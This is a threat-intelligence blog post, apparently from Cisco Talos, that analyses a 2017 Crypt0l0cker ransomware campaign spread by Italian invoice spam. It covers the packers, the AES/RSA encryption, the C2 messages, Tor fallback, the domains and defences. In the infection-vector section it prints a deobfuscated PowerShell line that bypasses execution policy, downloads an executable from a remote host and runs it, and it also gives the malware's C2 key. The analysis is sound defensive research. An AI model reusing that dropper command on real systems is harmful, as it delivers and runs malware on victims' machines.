March 10,2017
Ransomware continues to be a plague on the internet and still sets itself as the fastest growing malware family we have seen in the last number of years. In this post we describe the technical details about a newly observed campaign of the notorious Crypt0l0cker (aka TorrentLocker or Teerac) ransomware. Crypt0l0cker has gone through a long evolution, the adversaries are updating and improving the malware on a regular basis. Several indicators inside the samples we have analysed point to a new major version of the malware. We have already seen large campaigns targeting Europe and other parts of the world in 2014 and 2015. It seems to be that the actors behind these campaigns are back now and launching again massive spam attacks. This post will also give you insights about the level of sophistication this malware has reached.
Cisco customers who have Cisco AMP configured to submit samples, allowed us to identify attempted attacks on their end users. We used that as an initial starting point for our investigations. A Nullsoft Installer based executable was used in an attempt to compromise the victim hosts. The adversaries were using the Nullsoft Installer to execute a malicious DLL which starts the unpacking process of the ransomware payload.
This is a similar behavior, as seen in the previous version, which was distributed two weeks before this campaign. The attackers were also using the Nullsoft Installer to execute a malicious unpacking DLL. In that case it was called Cavalry.dll (and other names). Both Cavalry.dll and Incognito.dll are totally different from an obfuscation point of view, nevertheless they both eventually infect the local machine with Crypt0l0cker.
It is worth to note that besides using TLS encrypted back channels for exfiltrating user and other information to servers placed in the internet, the sample uses Tor as a backup for these connections.
In other ransomware campaigns we have often seen that only the payment process was protected by Tor, not the whole infection chain. Crypt0l0cker appears to be using the Tor servers as fallbacks, if the SSL servers are not reachable. More and more malware is leveraging Tor to hide their tracks. Obviously this makes it harder to detect these campaigns in the network traffic (Tor traffic aside). It also takes more time to identify the malware infrastructure to finally take them down.
As usual, after the infection process is done, the ransomware encrypts all user files and displays the well known user messages (see below). The malware also comes with full localization. The payload displays the messages in different languages depending on the victim’s geographic location based on his or her IP address (including some grammar mistakes which suggest native speakers were not used for translation but perhaps services similar to Google Translate):
Victim IP address in Germany:
Victim IP address in Italy:
Victim IP address in the UK:
The attackers were using a Web2Tor gateway to make it easier for the victim to get to the Decryption Portal hosted on the Tor network. This means the victim does not need to install a Tor browser as required by older versions of the ransomware. In this case the Tor browser option serves as a fallback in case the Web2Tor Gateway does not work, as it is visible in the above messages.
The Crypt0L0cker decryption portal displays instructions on how to pay for the decryption of the encrypted files:
The screenshots prove that today's ransomware often comes with a user friendly interface. In this case, the attackers try to make it as easy as possible for the victim to transfer money. The ransomware is offering a free decryption of one file as a proof of attacker’s ability to restore the encrypted files, so that the user agrees to pay the full ransom.
To appear more professional, the attackers have also created an FAQ page as well as a support form allowing the victim to contact them directly. See Fig. G and H below.
Technical Details
Binary Analysis
The adversaries are using a multi stage packer to unpack the actual ransomware payload.
After the packer has unpacked the actual ransomware payload, it starts to encrypt the user files.
It is using the AES CBC algorithm and encrypts a maximum of 0x100000 bytes per file. The key is randomly generated per attack attempt and is send to the server as Message ID 1 before any encryption is attempted (see command and control channel below). Before sending the AES key, it is encrypted with RSA using the WinCryptAPI and a public key which is embedded in the binary. If the attack is interrupted then a new AES key is generated. LibTomCrypt is used for the AES CBC encryption.
In addition to encrypting files on the local drive, Crypt0l0cker is also scanning connected external drives e.g. USB drives and shared network resources for files to encrypt.
Crypt0l0cker is using a list of file extensions. Files with these extensions are excluded from the file encryption process. It is interesting to see that the authors also exclude some image and text formats, perhaps to prevent the malware from encrypting its own files including the ransom messages and log files.
File extensions excluded from encryption are:
exe,dll,sys,vdx,vxd,com,msi,scr,cpl,bat,cmd,lnk,url,log,log2,tmp,###,ini,chm,manifest,inf,html,
txt,bmp,ttf,png,ico,gif,mp3,wav,avi,theme,evtx,folder,kdmp
Beside of encrypting files, it also tries to access some email client data e.g. Thunderbird contacts and exfiltrates them. If you are a Windows XP user, the protected storage (Pstore) is also exfiltrated.
Crypt0l0cker writes several different log files to disk which maintain the status of the infection and encryption process (see Table A). The ewiwobiz log file (Code 0) starts with a status number. This number is read by the malware everytime it starts up, allowing it to resume where it was, if the infection and encryption processes are interrupted. This number is stored in an AES encrypted format. The function writing the status informations to disk takes the code below as one of its arguments.
Talos analyzed the command and control channel used by Crypt0l0cker. All messages to the server begin with the following function block (see below). When connecting over Tor the block includes the system's external IP address, used to define the language used for the ransom messages.
Message ID 0: Seems to be an initial hello. The response to Message ID 0 resembles to:
Message ID 1 (=Sending the server the encrypted AES key). In addition to the encrypted AES key Message ID 1 also includes an Adler32 Checksum of the plaintext key.
Message ID 2 exfiltrates the content of log/storage file 7: the number of currently encrypted files.
Message IDs 3-6 are used for exfiltrating contact information, stolen email contacts and the protected storage (Pstore) protected data on Windows XP.
All the command and control communication is AES encrypted with the following base-64 encoded key "+sE1f/z+yCqxGuwIjmjx0DH0RwrdkifakZGwEX76iWY=". This wrapping is
performed in addition to TLS or TOR tunnel. This so-called double wrapped communication is required because the TLS does not perform any server verification which renders it vulnerable to man in the middle attacks.
DNS Details
The binary tries to connect to the following domains:
And additionally to the following domains to check the external IP address of the victim's machine. Based on the response, a localized message is presented to the victim after the files were encrypted.
This is a very similar behaviour like we have seen in the privious version. The previous version samples are also reaching out to a number of randomly generated subdomains like ugaqucy.sharptok.org and others. The giftbests.com domain registration schema follows the same method like we have seen before.
They are all registered to the same russian ISP “reg.ru” with IANA Id 1606 and protected by a WHOIS protection service. The email used to register them is only used once for the particular domain e.g.
Who registered giftbests.com:
What other domains has this email registered ? Only one.
DNS requests for the domain giftbests.com shows a few spikes before the campaign goes into an idle stage with half or even less number of DNS requests per hour. We can assume that this might be the result of the adversaries behind the campaign changing parameters of the campaigns e.g. new binaries, new droppers etc and/or launching new spam campaigns at these points in time. It also shows that these campaigns are not using these domains for too long. The active phase seems to be restricted to a few days.
giftbests.com:
This pattern of behaviour is even more pronounced for the other domains we monitored during the previous campaign:
divamind.org:
sharptok.org:
Talos has analyzed the number of registered subdomains and Sharptok.org has more than 9999 subdomains registered. We stopped the correlation at this point.
For giftbests.com we found at least 273 and for divamind.org at least 63 registered subdomains. All following the same schema of <some random characters for subdomain>.<domain name> for example hjaqvd.giftbests.com.
The domain giftbests.com is using the following name server, which are registered with a German Registrar.
This is not uncommon. Germany has one of the strictest privacy laws and we see a lot of malware misusing this to make it harder to get background information about the campaigns. Frequently Germany or the Netherlands are the preferred countries in Europe where criminals like to hide their online identities.
Aside from TLS traffic going to the domains above, the sample is using the Tor network for resilience. The malware sends the same data sent to the TLS servers to the following hidden Tor servers reachable via the following onion service addresses:
The malware uses simple logic to determine which infrastructure to use - if the TLS servers are not reachable use the Tor servers as backup.
Initial Infection Vector Details
We correlated the information found above to find the initial infection vectors in our telemetry data. The victims were mainly infected by spam emails. Let us describe one of these campaigns in detail. The emails contains a .zip file as attachment. The archive itself contains a JavaScript file. The filename of the JavaScript follows the following patterns:
- Fattura_[random number on 6 digits].js
- fattura n.4587 7.02.2017.js
The email written in Italian, translates to:
"Invoice 599044
Hi,
you can find a copy of the invoice 599044 related to the goods shipped today in the attachment.
Regards,
Gaia Leone (Name, Surname)
From our telemetry, this specific campaign started the 7th of February. Let’s have a look to the layers of obfuscation regarding the attachment.
Stage 1: JavaScript Obfuscation: The analyzed JavaScript (7505f9a8c2092b255f9f41571fba2c09143b69c7ab9505c28188c88d4c80c5a7) is obfuscated:
The obfuscation algorithm is based on strings manipulation. Once decoded, the JavaScript executes a second stage which is a PowerShell script.
Stage 2: PowerShell Obfuscation
The second stage is obfuscated too. Please see the PowerShell script below.
The obfuscation uses a string manipulation too. If we put the strings in the correct order we have the following script:
Set-ExecutionPolicy Bypass -Scope Process $path=($env:temp+\agcedho.exe New-Object System.Net.Webclient).DownloadFile(hxxp://quatang.thackhoi.com/system.ohp,$path); Start-Process $path
The purpose is to download a PE file from hxxp://quatang.thackhoi.com/system.ohp and store it in the user directory: “C:\Users\[User]\AppData\Local\Temp” with the filename “agcedho.exe” and then execute the file.
The Command and Control infrastructure reversed from the samples
We deobfuscated the samples mentioned in the IOCs chapter in order to identify the infrastructure use to download the final payload.
Among the servers mentioned above, the available ones are all powered by WordPress. Checking the versions of WordPress running on these, shows that these are unpatched systems running outdated versions of WordPress. It is likely that the adversaries used a vulnerability in WordPress to compromise these machines. This would be consistent with many of the campaigns Talos has investigated in the recent past. Typically, within a few days of a WordPress vulnerability being discovered, attackers scan for WordPress sites that can be compromised. Hence, keeping WordPress based systems fully patched is vital to prevent such sites from being abused in attacks such as these.
IOCs
Domains from sample:
Other related domains:
Tor addresses found in the sample:
AMP samples analyzed:
Dropped binaries:
Italian spam JS:
URL from the JS:
URL from our telemetry:
More IOC provided as files:
Domains found via domain correlation, most unused so far.
$cat giftbests.com-sorted.txt | wc -l
273
$cat sharptok.org-sorted.txt | wc -l
9999
$cat divamind.org-sorted.txt | wc -l
63
Summary
We have shown in this analysis that ransomware is still one of the biggest threats in the industry and that the techniques used by the authors are getting more and more sophisticated. Today's ransomware not only encrypts files on the local hard drive, it also tries to encrypt every other reachable file, e.g. files on network shares or USB drives. Additionally to the ransomware threat, Crypt0l0cker also steals email contacts and other sensitive data.
The adversaries use a clever mix of different obfuscation technologies. All stages of the attack are heavily obfuscated to bypass common security products. It begins with the initial infection vector when the malware is send to the victim via spam email. Attachments are zip files which contain malicious obfuscated javascript which itself unpacks a powershell script. This script downloads the actual obfuscated ransomware. The ransomware itself is an executable which is packed multiple times with different techniques. Finally after 6 layers of obfuscation (2 in the dropper, 4 in the executable) the final ransomware code starts to execute.
From a networking and DNS perspective the adversaries are also trying everything to hide their tracks. All communication is encrypted and/or protected by Tor. Domains are registered to a single fake email, which is not used in any other campaign. All DNS information is protected by a WHOIS protection service.
Addressing the overall threat that ransomware presents requires organizations to be aware that adversaries will continue to evolve. Utilizing a multi-layered defensive approach will help organizations be able to detect and protect against threats like Crypt0l0cker. Talos continues to monitor Crypt0l0cker as it evolves to ensure that defenses protect our customers. We strongly encourage users and organizations to follow recommended security practices, such as installing security patches as they become available, exercising caution when receiving messages from unknown third-parties, and ensuring a robust offline backup solution is in place. These practices will help reduce the threat of a compromise and should aid in the recovery of any such attack. We also heavily recommend to contact the local authorities if you become a victim of ransomware.
Coverage
Additional ways our customers can detect and block this threat are listed below.
Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks. Email Security can block malicious emails sent by threat actors as part of their campaign. The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors. AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. Umbrella prevents DNS resolution of the domains associated with malicious activity.
News Courtesy : http://blog.talosintelligence.com/2017/03/crypt0l0cker-torrentlocker-old-dog-new.html